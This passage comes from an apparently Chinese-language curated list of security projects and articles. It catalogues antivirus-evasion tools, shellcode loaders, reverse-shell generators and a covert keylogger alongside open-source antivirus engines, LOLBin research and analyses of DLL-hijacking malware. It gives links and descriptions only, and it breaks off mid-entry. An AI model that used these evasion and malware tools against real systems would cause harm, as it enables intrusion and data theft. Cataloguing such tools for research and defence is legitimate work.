id="989d2090c76a62641b74bc2b1b8d0ae7"></a>工具 - [**195**星][2y] [Py] [mr-un1k0d3r/unibyav](https://github.com/mr-un1k0d3r/unibyav) a simple obfuscator that take raw shellcode and generate executable that are Anti-Virus friendly. # <a id="8bc66a23c82b90dacd110a357b88ea61"></a>armor *** ## <a id="3ada1997ce6a96c892f7ab3fa8dad2ec"></a>工具 - [**186**星][2y] [Shell] [tokyoneon/armor](https://github.com/tokyoneon/armor) Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners. # <a id="517b0aeab5f2cd945f94f91e8974cf5a"></a>foolav *** ## <a id="e5b6342fb680c4bd510d354bf7980dca"></a>工具 - [**177**星][1m] [C] [hvqzao/foolav](https://github.com/hvqzao/foolav) Pentest tool for antivirus evasion and running arbitrary payload on target Wintel host - [**87**星][2m] [C] [hvqzao/foolavc](https://github.com/hvqzao/foolavc) foolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV *** ## <a id="7d46cbb4cb861c45336127542614b679"></a>文章 - 2016.05 [safebuff] [Bypass Antivirus via foolav](http://blog.safebuff.com/2016/05/26/Bypass-Antivirus-via-foolav/) - 2016.02 [freebuf] [Foolav:免杀小工具+win主机运行任意payload](http://www.freebuf.com/sectool/96970.html) # <a id="5d6c4ac2fad929e20c0078b587498fe3"></a>Inception *** ## <a id="ffc28f955ef67e69a7302028e7fe5c7e"></a>工具 - [**307**星][2y] [Py] [two06/inception](https://github.com/two06/inception) Provides In-memory compilation and reflective loading of C# apps for AV evasion. # <a id="376fa2db1df60456ca1de20b473dda6f"></a>CarbonCopy *** ## <a id="c4b468e647a6c596f085d35be9c954cf"></a>工具 - [**708**星][12m] [Py] [paranoidninja/carboncopy](https://github.com/paranoidninja/carboncopy) A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux # <a id="8545aec3222685f7ade02e2b46d08b9c"></a>metasploitavevasion *** ## <a id="56cc20e65680f66c92c00965803e9c37"></a>工具 - [**239**星][12d] [Shell] [nccgroup/metasploitavevasion](https://github.com/nccgroup/metasploitavevasion) Metasploit AV Evasion Tool # <a id="4bd9e808211303a5ba0ae1ad0dd9479e"></a>SideStep *** ## <a id="8813c1723abf0617203a5194679eac5a"></a>工具 - [**112**星][3y] [C++] [codewatchorg/sidestep](https://github.com/codewatchorg/sidestep) Yet another AV evasion tool *** ## <a id="013f4c8152b842e7b69245a620ca70e4"></a>文章 - 2014.12 [securityledger] [Cat and Mouse: Web Attacks Increasingly Sidestep WAF Protections](https://securityledger.com/2014/12/cat-and-mouse-web-attacks-increasingly-sidestep-waf-protections/) # <a id="888ee9daabdbd703448f8910aa9704e2"></a>nativepayload_dns *** ## <a id="f5adbcc74fc6e3a0b6b8075e08029d53"></a>工具 - [**207**星][2y] [C#] [damonmohammadbagher/nativepayload_dns](https://github.com/damonmohammadbagher/nativepayload_dns) 使用DNS流量传输Payload,绕过杀软。C#编写 # <a id="b78301af3e251368517e446160caa268"></a>HackTheWorld *** ## <a id="e32647912325352a4af7f8e0b7079218"></a>工具 - [**328**星][2y] [Py] [stormshadow07/hacktheworld](https://github.com/stormshadow07/hacktheworld) An Python Script For Generating Payloads that Bypasses All Antivirus so far . # <a id="f3473296bad376d23c4c7ee3e4aef378"></a>Salsa-tools *** ## <a id="8cf63337df4bb46d78ecef66db7f32ba"></a>工具 - [**322**星][3m] [C#] [hackplayers/salsa-tools](https://github.com/hackplayers/salsa-tools) ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY and AV bypass, AMSI patched # <a id="c2951eccbf61918b64cfe866f631482c"></a>mcreator *** ## <a id="60b14a1abbbd681bd496f0ba28115f1b"></a>工具 - [**139**星][12d] [Py] [blacknbunny/mcreator](https://github.com/blacknbunny/mcreator) 反向Shell生成器, 自带AV绕过技术 # <a id="6d54eff12d6ae09b0713e047857c3a4d"></a>杀毒软件 *** ## <a id="0f79ac3b032081b26dbcb3144c795c1d"></a>ClamAV ### <a id="00cbab201c6762bbcae7c84b7d0899c1"></a>工具 - [**1064**星][10d] [C++] [cisco-talos/clamav-devel](https://github.com/Cisco-Talos/clamav-devel) 开源AV引擎ClamAV - [**409**星][11d] [cisco-talos/clamav-faq](https://github.com/cisco-talos/clamav-faq) ClamAV FAQ - [**354**星][15d] [Shell] [extremeshok/clamav-unofficial-sigs](https://github.com/extremeshok/clamav-unofficial-sigs) ClamAV Unofficial Signatures Updater maintained by eXtremeSHOK.com - [**266**星][17d] [Shell] [essandess/macos-fortress](https://github.com/essandess/macos-fortress) Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav) - [**86**星][11d] [Dockerfile] [mko-x/docker-clamav](https://github.com/mko-x/docker-clamav) Dockerized open source antivirus for use with file sharing containers, REST API or TCP. - [**81**星][17d] [Py] [momika233/clamav_0day_exploit](https://github.com/momika233/clamav_0day_exploit) ClamAV_0Day_exploit - [**60**星][12d] [Ruby] [kobaltz/clamby](https://github.com/kobaltz/clamby) ClamAV interface to your Ruby on Rails project. - [**43**星][7y] [Py] [sketchymoose/totalrecall](https://github.com/sketchymoose/totalrecall) Based on the Volatility framework, this script will run various plugins as well as create a timeline, or use YARA/ClamAV/VirusTotal to find badness. - [**38**星][2m] [C++] [cisco-talos/clamav-bytecode-compiler](https://github.com/cisco-talos/clamav-bytecode-compiler) ClamAV ByteCode Compiler - [**35**星][2y] [Py] [cisco-talos/casc](https://github.com/cisco-talos/casc) 在IDA的反汇编和字符串窗口中, 辅助创建ClamAV NDB 和 LDB签名 - [**33**星][4m] [Perl] [tripflex/cpsetup](https://github.com/tripflex/cpsetup) Intuitive bash/shell script to setup and harden/configure cPanel CentOS/RHEL server with ConfigServer Firewall, MailManage, MailQueue, Malware Detect, ClamAV, mod_cloudflare, CloudFlare RailGun, and many more applications and security tweaks - [**28**星][6m] [brandonprry/clamav-fuzz](https://github.com/brandonprry/clamav-fuzz) A fuzz job for ClamAV - [**23**星][24d] [geerlingguy/ansible-role-clamav](https://github.com/geerlingguy/ansible-role-clamav) Ansible Role - ClamAV. - [**11**星][1y] [C#] [rmuch/clamav.managed](https://github.com/rmuch/clamav.managed) ClamAV bindings for the .NET Framework, Mono and PowerShell. ClamAV.Managed is a library written in C# for the .NET Framework and Mono, providing managed bindings for the libclamav interface. It includes ClamAV.Managed.PowerShell, a set of PowerShell cmdlets for ClamAV scanning. It comes with sample code for building a GUI virus scanner applicat… - [**10**星][3m] [Py] [abhinavbom/clara](https://github.com/abhinavbom/clara) Serverless, real-time, ClamAV+Yara scanning for your S3 Buckets - [**9**星][1y] [Go] [monostream/muescheli](https://github.com/monostream/muescheli) A simple AntiVirus-as-a-Service implementation using ClamAV - [**4**星][1y] [Py] [hestat/clamav-cortexanalyzer](https://github.com/hestat/clamav-cortexanalyzer) Analyzer for TheHive Cortex Soc platform. Allows you to run observables against default and custom ClamAV rules. - [**2**星][1m] [Ruby] [simp/pupmod-simp-clamav](https://github.com/simp/pupmod-simp-clamav) The SIMP clamav Puppet Module ### <a id="50a64cc4d87a6d9a7a42502573dd36bb"></a>文章 - 2019.12 [talosintelligence] [ClamAV team shows off new Mussels dependency build automation tool](https://blog.talosintelligence.com/2019/12/clamav-team-shows-off-new-mussels.html) - 2019.08 [4hou] [ClamAV+Falco,助你高效检测挖矿Docker](https://www.4hou.com/system/19833.html) - 2018.09 [infosecinstitute] [Gentoo Hardening: Part 4: PaX, RBAC and ClamAV [Updated 2018]](https://resources.infosecinstitute.com/gentoo-hardening-part-4-pax-rbac-clamav/) - 2017.02 [nviso] [Hunting with YARA rules and ClamAV](https://blog.nviso.be/2017/02/14/hunting-with-yara-rules-and-clamav/) - 2016.10 [hackers] [Evading AV: Anatomy of ClamAV](https://www.hackers-arise.com/single-post/2016/10/28/Evading-AV-Anatomy-of-ClamAV) - 2016.06 [calderonpale] [Erm… ClamAV daemon can be shutdown with a simple SHUTDOWN command](http://calderonpale.com/erm-clamav-daemon-can-be-shutdown-with-a-simple-shutdown-command/) - 2016.06 [calderonpale] [Erm… ClamAV daemon can be shutdown with a simple SHUTDOWN command](http://calderonpale.com/?p=318) - 2016.06 [foxglovesecurity] [Finding pearls; fuzzing ClamAV](https://foxglovesecurity.com/2016/06/13/finding-pearls-fuzzing-clamav/) - 2015.09 [n0where] [Robust ClamAV-based Linux Malware Scanner: MalScan](https://n0where.net/robust-clamav-based-linux-malware-scanner-malscan) - 2015.06 [linux] [Installing ClamAV on CentOS 7 and Using Freshclam](https://linux-audit.com/install-clamav-on-centos-7-using-freshclam/) - 2015.02 [linux] [Using ClamAV for Linux PCI DSS requirement 5: Malware](https://linux-audit.com/using-clamav-for-linux-pci-dss-requirement-5-malware-and-anti-virus/) - 2013.12 [talosintelligence] [A quick tutorial on ClamAV detection: Win.Adware.Bprotector](https://blog.talosintelligence.com/2013/12/a-quick-tutorial-on-clamav-detection.html) - 2012.11 [firebitsbr] [Clamav – Fazendo scanning de arquivos suspeitos e movendo para uma pasta em específico](https://firebitsbr.wordpress.com/2012/11/03/clamav-fazendo-scanning-de-arquivos-suspeitos-e-movendo-para-uma-pasta-em-especifico/) - 2012.09 [firebitsbr] [Malware: Scanning com Adobe Malware Classifier/Clamav por possível Malwares em PDF](https://firebitsbr.wordpress.com/2012/09/23/malware-scanning-com-adobe-malware-classifierclamav-por-possivel-malwares-em-pdf/) - 2012.08 [talosintelligence] [ClamAV vs. Content IQ Test, part 4](https://blog.talosintelligence.com/2012/08/clamav-vs-content-iq-test-part-4.html) - 2012.06 [hiddenillusion] [XDP files and ClamAV](http://hiddenillusion.blogspot.com/2012/06/xdp-files-and-clamav.html) - 2012.05 [talosintelligence] [ClamAV and Snort coverage for Flashback and Sabpub](https://blog.talosintelligence.com/2012/05/clamav-and-snort-coverage-for-flashback.html) - 2012.04 [talosintelligence] [ClamAV vs. Content IQ Test, part 3](https://blog.talosintelligence.com/2012/04/clamav-vs-content-iq-test-part-3.html) - 2012.03 [talosintelligence] [ClamAV vs. Content IQ Test, part 2](https://blog.talosintelligence.com/2012/03/clamav-vs-content-iq-test-part-2.html) - 2012.02 [talosintelligence] [ClamAV vs. Content IQ Test, part 1](https://blog.talosintelligence.com/2012/02/clamav-vs-content-iq-test-part-1.html) - 2011.04 [toolswatch] [Malware Analysis: Classifying with ClamAV and YARA](http://www.toolswatch.org/2011/04/malware-analysis-classifying-with-clamav-and-yara/) - 2011.02 [talosintelligence] [Blacklist.rules, ClamAV, and Data Mining](https://blog.talosintelligence.com/2011/02/blacklistrules-clamav-and-data-mining.html) - 2011.02 [sans] [Snort 2.9.0.4 is coming out Thursday, ClamAV 0.97 update released](https://isc.sans.edu/forums/diary/Snort+2904+is+coming+out+Thursday+ClamAV+097+update+released/10381/) - 2010.12 [talosintelligence] [ClamAV 3.0 for Windows Open Beta](https://blog.talosintelligence.com/2010/12/clamav-30-for-windows-open-beta.html) - 2010.11 [pediy] [[原创]ClamAV v0.93分析及引擎总结](https://bbs.pediy.com/thread-125709.htm) - 2010.09 [talosintelligence] [Introduction to ClamAV's Low Level Virtual Machine (LLVM)](https://blog.talosintelligence.com/2010/09/introduction-to-clamavs-low-level.html) - 2010.08 [talosintelligence] [ClamAV Release Announcements](https://blog.talosintelligence.com/2010/08/clamav-release-announcements.html) - 2010.06 [talosintelligence] [ClamAV for Windows](https://blog.talosintelligence.com/2010/06/clamav-for-windows.html) - 2010.04 [sans] [ClamAV 0.94 EOL Reminder](https://isc.sans.edu/forums/diary/ClamAV+094+EOL+Reminder/8635/) - 2009.06 [talosintelligence] [ClamAV DoJoSec Talk Addendum](https://blog.talosintelligence.com/2009/06/clamav-dojosec-talk-addendum.html) - 2009.05 [jsunpack] [Using ClamAV on the command line as an automatic unpacker](http://jsunpack.blogspot.com/2009/05/using-clamav-on-command-line-as.html) - 2009.01 [addxorrol] [ClamAV and unpackers](http://addxorrol.blogspot.com/2009/01/clamav-and-unpackers.html) - 2008.10 [talosintelligence] [Update on Snort and ClamAV for ms08-067](https://blog.talosintelligence.com/2008/10/update-on-snort-and-clamav-for-ms08-067.html) - 2008.09 [talosintelligence] [Logical signatures in ClamAV 0.94](https://blog.talosintelligence.com/2008/09/logical-signatures-in-clamav-094.html) - 2008.02 [virusbulletin] [Trend vs. ClamAV patent row hots up](https://www.virusbulletin.com/blog/2008/02/trend-vs-clamav-patent-row-hots/) - 2007.12 [sans] [New Vulnerabilities in ClamAV](https://isc.sans.edu/forums/diary/New+Vulnerabilities+in+ClamAV/3796/) - 2007.08 [sans] [Principle of Most Privilege and the Snort/ClamAV Purchase](https://isc.sans.edu/forums/diary/Principle+of+Most+Privilege+and+the+SnortClamAV+Purchase/3294/) - 2007.04 [sans] [New ClamAV version fixes buffer overflow vulnerability](https://isc.sans.edu/forums/diary/New+ClamAV+version+fixes+buffer+overflow+vulnerability/2640/) - 2007.02 [sans] [Clamav security vulnerabilities](https://isc.sans.edu/forums/diary/Clamav+security+vulnerabilities/2253/) - 2006.10 [sans] [ClamAV fixes multiple vulnerabilities](https://isc.sans.edu/forums/diary/ClamAV+fixes+multiple+vulnerabilities/1790/) - 2006.08 [sans] [ClamAV versions up to 0.88.3 DoS](https://isc.sans.edu/forums/diary/ClamAV+versions+up+to+0883+DoS/1553/) - 2005.11 [sans] [ClamAV 0.87.1 released, fixes multiple security vulnerabilities](https://isc.sans.edu/forums/diary/ClamAV+0871+released+fixes+multiple+security+vulnerabilities/822/) - 2005.07 [sans] [ClamAV vulnerability; Con-fu](https://isc.sans.edu/forums/diary/ClamAV+vulnerability+Confu/608/) - 2005.05 [sans] [GAO Report on DHS; ezSTUB; Worm.Gibe.F; BlueTooth Security? ClamAv MACosX](https://isc.sans.edu/forums/diary/GAO+Report+on+DHS+ezSTUB+WormGibeF+BlueTooth+Security+ClamAv+MACosX/551/) - 2005.05 [sans] [Google Web Accelerator; Snort with ClamAV; RSA SecurID WebAgent Overflow](https://isc.sans.edu/forums/diary/Google+Web+Accelerator+Snort+with+ClamAV+RSA+SecurID+WebAgent+Overflow/530/) *** ## <a id="23f0535e20d7568cb2148058d4d0eec7"></a>phpmussel ### <a id="df50a8b098bb9d9705d23a1c5aee1b9d"></a>工具 - [**312**星][13d] [PHP] [phpmussel/phpmussel](https://github.com/phpmussel/phpmussel) PHP-based anti-virus anti-trojan anti-malware solution. *** ## <a id="d2b49dd7f9e44ce9bebaa9a2d10fb418"></a>AntiSpy ### <a id="5b8aed4a3f150a46044fcbb9303bbe07"></a>工具 - [**717**星][15d] [C] [mohuihui/antispy](https://github.com/mohuihui/antispy) AntiSpy is a free but powerful anti virus and rootkits toolkit.It offers you the ability with the highest privileges that can detect,analyze and restore various kernel modifications and hooks.With its assistance,you can easily spot and neutralize malwares hidden from normal detectors. ### <a id="0dac6b8f6f53c74872ba8abc870c5786"></a>文章 - 2019.12 [freebuf] [AntiSpy:一款功能强大的反病毒&反Rootkit免费工具套件](https://www.freebuf.com/articles/system/221820.html) - 2019.11 [hakin9] [Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit](https://hakin9.org/antispy-a-free-but-powerful-anti-virus-and-rootkits-toolkit/) *** ## <a id="266b4e495fed809aebd810e9179943bc"></a>TinyAntivirus ### <a id="b5fda8d31849edf53b8c3c683f30f990"></a>工具 - [**296**星][3y] [C++] [develbranch/tinyantivirus](https://github.com/develbranch/tinyantivirus) TinyAntivirus is an open source antivirus engine designed for detecting polymorphic virus and disinfecting it. *** ## <a id="e14845ece905066b4158a157822a5b46"></a>yourav ### <a id="ee1cb60a806b81ce73708f6dbd2c5ab6"></a>工具 - [**493**星][3y] [C#] [tlaster/yourav](https://github.com/tlaster/yourav) 宇宙级最轻量杀毒软件 *** ## <a id="c0262ea14af5f0a32ea77c42f74d9083"></a>Armadito ### <a id="412655e126f176b7d826ae47f4d709bd"></a>工具 - [**166**星][30d] [C] [armadito/armadito-av](https://github.com/armadito/armadito-av) Armadito antivirus main repository - [**10**星][1y] [PHP] [armadito/armadito-glpi](https://github.com/armadito/armadito-glpi) Plugin Armadito for GLPI - [**5**星][1y] [JS] [armadito/deprecated-web-ui](https://github.com/armadito/deprecated-web-ui) Deprecated Armadito web user interface *** ## <a id="f5ea509928f78d22baaf8b7d2d83b1c1"></a>kicomav ### <a id="ae0cbebfda20355ed559439425b8bb53"></a>工具 - [**197**星][12d] [Py] [hanul93/kicomav](https://github.com/hanul93/kicomav) KicomAV is an open source (GPL v2) antivirus engine designed for detecting malware and disinfecting it. *** ## <a id="5405d662fd54f801c7210a7bda946945"></a>工具 - [**335**星][14d] [Java] [widdix/aws-s3-virusscan](https://github.com/widdix/aws-s3-virusscan) S3 Buckets反病毒 - [**107**星][2y] [C] [formyown/alesense-antivirus](https://github.com/formyown/alesense-antivirus) 一款拥有完整交互界面与驱动级拦截能力的开源杀毒软件 - [**33**星][3y] [Py] [jkkj93/mint-webshell-defender](https://github.com/jkkj93/mint-webshell-defender) 薄荷WEBSHELL防御系统,是一款WEBSHELL查杀/防御软件,采用PYTHON编写 - [**26**星][4y] [Java] [whyalwaysmea/mobilesafe](https://github.com/whyalwaysmea/mobilesafe) 这是一个android版的手机卫士,包含一下功能:1.手机防盗 2. 黑名单设置 3.软件管理 4.进程管理 5.流量统计 6.缓存清理 7.手机杀毒 8.来电归属地显示 9.号码归属地查询 10.程序锁 - [**12**星][4y] [C++] [majian55555/mjantivirusengine](https://github.com/majian55555/mjantivirusengine) Anti-virus engine in Windows using VC++ 6.0 and MFC. We applied windows multithreading in virus scan method and user interface. Using MFC encapsulated threads library and Win32 APIs as well. - [**9**星][5m] [VBScript] [zelon88/hr-av](https://github.com/zelon88/hr-av) A fully original Windows anti-virus client from HonestRepair using the same custom antivirus engine as our Cloud. - [**1**星][2y] [zhiyuanwang-chengdu-qihoo360/superantispyware_poc](https://github.com/zhiyuanwang-chengdu-qihoo360/superantispyware_poc) SUPERAntiSpyware CVE # <a id="1bfd82f11c1dfbbe3bc02196944ffac5"></a>白利用 *** ## <a id="7d2569935e9e48ed6bbe0caca9efc76e"></a>文章-白利用 - 2020.03 [freebuf] [APT攻防之红队入侵:DLL劫持与白利用](https://www.freebuf.com/articles/system/227824.html) - 2017.08 [freebuf] [远控木马上演白利用偷天神技:揭秘假破解工具背后的盗刷暗流](http://www.freebuf.com/articles/terminal/144590.html) - 2017.08 [4hou] [远控木马上演白利用偷天神技:揭秘假破解工具背后的盗刷暗流](http://www.4hou.com/technology/7302.html) - 2017.06 [freebuf] [白利用的集大成者:新型远控木马上演移形换影大法](http://www.freebuf.com/articles/system/138164.html) - 2017.06 [4hou] [白利用的集大成者:新型远控木马上演移形换影大法](http://www.4hou.com/info/news/5742.html) - 2017.06 [360] [白利用的集大成者:新型远控木马上演移形换影大法](https://www.anquanke.com/post/id/86311/) - 2015.05 [freebuf] [移花接木大法:新型“白利用”华晨远控木马分析](http://www.freebuf.com/articles/system/68469.html) - 2015.05 [] [移花接木大法:新型“白利用”华晨远控木马分析](http://blogs.360.cn/360safe/2015/05/27/white-used/) - 2015.05 [] [移花接木大法:新型“白利用”华晨远控木马分析](http://blogs.360.cn/blog/white-used/) - 2015.01 [] [移花接木大法:新型“白利用”华晨远控木马分析](http://blogs.360.cn/post/white-used.html) - 2014.09 [qq] [新型白利用(暴风)远控木马分析](https://tav.qq.com/index/newsDetail/162.html) *** ## <a id="f12f806947d9d9c0cc78e8d5af783bee"></a>文章-白加黑 - 2018.02 [360] [远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财](https://www.anquanke.com/post/id/97329/) - 2014.12 [sinaapp] [深入探究Windows平台客户端安全问题-进程地址空间入侵及白加黑高阶利用](http://blog.sycsec.com/?p=129) - 2014.09 [pediy] [[原创]深入探究Windows平台客户端安全问题-进程地址空间入侵和白加黑高阶利用](https://bbs.pediy.com/thread-192034.htm) *** ## <a id="3893c1696e85d78880d012ed01d85982"></a>文章-LOLBins - 2020.02 [hexacorn] [Stay positive Lolbins… not!](http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/) - 2020.02 [hexacorn] [SettingSyncHost.exe as a LolBin](http://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/) - 2020.01 [reegun] [Curl.exe is the new rundll32.exe — LOLbin](https://medium.com/p/3f79c5f35983) - 2020.01 [reegun] [LOLbin — ProtocolHandler.exe](https://medium.com/p/b93d48748cec) - 2019.12 [4hou] [GLUPTEBA使用LOLBINS和CRYPTOMINER扩展操作和工具包](https://www.4hou.com/web/20911.html) - 2019.11 [talosintelligence] [Hunting for LoLBins](https://blog.talosintelligence.com/2019/11/hunting-for-lolbins.html) - 2019.11 [hexacorn] [Quo Vadis, Lolbin](http://www.hexacorn.com/blog/2019/11/01/quo-vadis-lolbin/) - 2019.09 [topsec] [LOLBins详解](http://blog.topsec.com.cn/lolbins%e8%af%a6%e8%a7%a3/) - 2019.09 [cybereason] [Glupteba Expands Operation and Toolkit with LOLBins And Cryptominer](https://www.cybereason.com/blog/glupteba-expands-operation-and-toolkit-with-lolbins-cryptominer-and-router-exploit) - 2019.09 [hexacorn] [Sitting on the Lolbins, 12](http://www.hexacorn.com/blog/2019/09/06/sitting-on-the-lolbins-12/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 10](http://www.hexacorn.com/blog/2019/08/31/sitting-on-the-lolbins-10/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 11](http://www.hexacorn.com/blog/2019/08/31/sitting-on-the-lolbins-11/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 9](http://www.hexacorn.com/blog/2019/08/30/sitting-on-the-lolbins-9/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 8](http://www.hexacorn.com/blog/2019/08/27/sitting-on-the-lolbins-8/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 7](http://www.hexacorn.com/blog/2019/08/26/sitting-on-the-lolbins-7/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 5](http://www.hexacorn.com/blog/2019/08/25/sitting-on-the-lolbins-5/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 6](http://www.hexacorn.com/blog/2019/08/25/sitting-on-the-lolbins-6/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 4](http://www.hexacorn.com/blog/2019/08/23/sitting-on-the-lolbins-4/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 3](http://www.hexacorn.com/blog/2019/08/22/sitting-on-the-lolbins-3/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 2](http://www.hexacorn.com/blog/2019/08/20/sitting-on-the-lolbins-2/) - 2019.08 [hexacorn] [Sitting on the Lolbins, 1](http://www.hexacorn.com/blog/2019/08/19/sitting-on-the-lolbins-1/) - 2019.06 [4hou] [恶意软件ADOBE WORM FAKER:通过LOLBins来“订制”你的专属payload](https://www.4hou.com/web/18818.html) - 2019.06 [cybereason] [Adobe Worm Faker Uses LOLbins And Dynamic Techniques To Deliver Customized Payloads](https://www.cybereason.com/blog/adobe-worm-faker-uses-lolbins-and-dynamic-techniques-to-deliver-customized-payloads) - 2019.05 [hexacorn] [msiexec.exe as a LOLBIN](http://www.hexacorn.com/blog/2019/05/29/msiexec-exe-as-a-lolbin/) - 2019.05 [hexacorn] [VS2005_vcredist_x86.exe as a LOLBIN](http://www.hexacorn.com/blog/2019/05/22/vs2005_vcredist_x86-exe-as-a-lolbin/) - 2019.05 [4hou] [黑客组织TA505利用LoLbin和新型后门攻击金融行业](https://www.4hou.com/web/17767.html) - 2019.04 [cybereason] [Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware](https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware) - 2019.04 [hexacorn] [Installers – Interactive Lolbins, Part 2](http://www.hexacorn.com/blog/2019/04/19/installers-interactive-lolbins-part-2/) - 2019.04 [hexacorn] [Installers – Interactive Lolbins](http://www.hexacorn.com/blog/2019/04/18/installers-interactive-lolbins/) - 2019.04 [hexacorn] [Signed Nullsoft Plug-ins – potential Lolbins](http://www.hexacorn.com/blog/2019/04/14/signed-nullsoft-plug-ins-potential-lolbins/) - 2019.03 [hexacorn] [Squirrel packages’ manager as a lolbin (a.k.a. many Electron apps are lolbins by default)](http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/) - 2019.01 [cybereason] [Banking Trojan Delivered By LOLbins: How the Ramnit Trojan spreads via sLoad in a cyberattack](https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan) - 2019.01 [sans] [LOLBin Detection Methods: Seven Common Attacks Revealed](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1559672268.pdf) - 2018.08 [hexacorn] [A few more LOLBins…](http://www.hexacorn.com/blog/2018/08/17/a-few-more-lolbins/) - 2018.08 [hexacorn] [Squirrel as a Lolbin](http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/) - 2018.08 [hexacorn] [PrintDialog.exe – yet another Lolbin for loading DLLs](http://www.hexacorn.com/blog/2018/08/11/printdialog-exe-yet-another-lolbin-for-loading-dlls/) - 2018.05 [hexacorn] [wab.exe as a LOLBin](http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/) - 2018.04 [oddvar] [使用GPscript.exe在主机启动时执行脚本](https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/) - 2018.04 [hexacorn] [I shot the sigverif.exe – the GUI-based LOLBin](http://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/) - 2018.04 [hexacorn] [ExtExport – yet another LOLBin](http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/) # <a id="e96af0ca0a80b6ab957e1a9b3bbfaa70"></a>SysWhispers *** ## <a id="d731b11009dd22d3df9458b4d43e4550"></a>文章 - 2020.02 [freebuf] [SysWhispers:如何通过直接系统调用实现AVEDR绕过](https://www.freebuf.com/sectool/224932.html) # <a id="168d42230cc287e1baccc651367d3e9b"></a>工具 *** ## <a id="93ec152efed1e1ec1343cfdac7988c08"></a>资源收集 - [**564**星][1y] [ASP] [landgrey/webshell-detect-bypass](https://github.com/landgrey/webshell-detect-bypass) 绕过专业工具检测的Webshell研究文章和免杀的Webshell - [**465**星][3m] [C#] [tidesec/bypassantivirus](https://github.com/tidesec/bypassantivirus) 远控免杀系列文章及配套工具,搜集汇总了互联网上的几十种免杀工具和免杀方法,并对免杀效果进行了一一测试,为远控的免杀和杀软对抗免杀提供参考。 *** ## <a id="f9687c608e750c19c2f8190158a63333"></a>新添加 - [**1436**星][4m] [Py] [ekultek/whatwaf](https://github.com/ekultek/whatwaf) 检测并绕过WAF和保护系统 - [**973**星][2y] [Py] [trycatchhcf/cloakify](https://github.com/trycatchhcf/cloakify) 数据外泄、渗透一目了然;使用基于文本的隐写术将任何文件类型转换为日常字符串列表;DLP/MLS设备,失效数据白名单控制,分析师的社会工程,规避AV检测 - [**507**星][4m] [Go] [cbeuw/cloak](https://github.com/cbeuw/cloak) A censorship circumvention tool to evade detection against state adversaries - [**442**星][8d] [Assembly] [jthuraisamy/syswhispers](https://github.com/jthuraisamy/syswhispers) AV/EDR evasion via direct system calls. - [**435**星][7d] [PS] [the-xentropy/xencrypt](https://github.com/the-xentropy/xencrypt) A PowerShell script anti-virus evasion tool - [**298**星][12m] [YARA] [supportintelligence/icewater](https://github.com/supportintelligence/icewater) YARA rules for the detection of malware and malicious files. the anti-virus industry prefers names for a threat - [**220**星][3y] [C++] [bee13oy/av_kernel_vulns](https://github.com/bee13oy/av_kernel_vulns) Pocs for Antivirus Software‘s Kernel Vulnerabilities - [**196**星][14d] [Smali] [sslab-gatech/avpass](https://github.com/sslab-gatech/avpass) Tool for leaking and bypassing Android malware detection system - [**187**星][10d] [Py] [tijme/angularjs-csti-scanner](https://github.com/tijme/angularjs-csti-scanner) Automated client-side template injection (sandbox escape/bypass) detection for AngularJS. - [**182**星][3y] [PHP] [lcatro/php-webshell-bypass-waf](https://github.com/lcatro/php-webshell-bypass-waf) 分享PHP WebShell 绕过WAF 的一些经验 - [**177**星][3y] [Py] [arno0x/shellcodewrapper](https://github.com/arno0x/shellcodewrapper) 支持多种语言的Shellcode包装器,支持编码/加密。可用于绕过杀软 - [**175**星][30d] [Go] [vyrus001/go-mimikatz](https://github.com/vyrus001/go-mimikatz) A wrapper around a pre-compiled version of the Mimikatz executable for the purpose of anti-virus evasion. - [**173**星][16d] [Py] [rvn0xsy/cooolis-ms](https://github.com/rvn0xsy/cooolis-ms) Cooolis-ms is a server that supports the Metasploit Framework RPC. It is used to work with the Shellcode and PE loader. To some extent, it bypasses the static killing of anti-virus software, and allows the Cooolis-ms server to communicate with the Metasploit server. Separation. - [**144**星][11d] [C++] [ajayrandhawa/keylogger](https://github.com/ajayrandhawa/Keylogger) Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software. Blackcat keylogger Monitors all keystokes, Mouse clicks. It has a seperate process which continues capture system screenshot and send to ftp server in given time. - [**135**星][3m] [C++] [huoji120/antivirus_r3_bypass_demo](https://github.com/huoji120/antivirus_r3_bypass_demo) 分别用R3的0day与R0的0day来干掉杀毒软件 - [**131**星][2y] [Py] [cisco-talos/bass](https://github.com/cisco-talos/bass) 从先前生成的恶意软件集群的样本中自动生成AV签名 - [**118**星][30d] [C] [govolution/avepoc](https://github.com/govolution/avepoc) 一些免杀的 poc - [**116**星][21d] [C#] [p0cl4bs/hanzoinjection](https://github.com/p0cl4bs/hanzoinjection) injecting 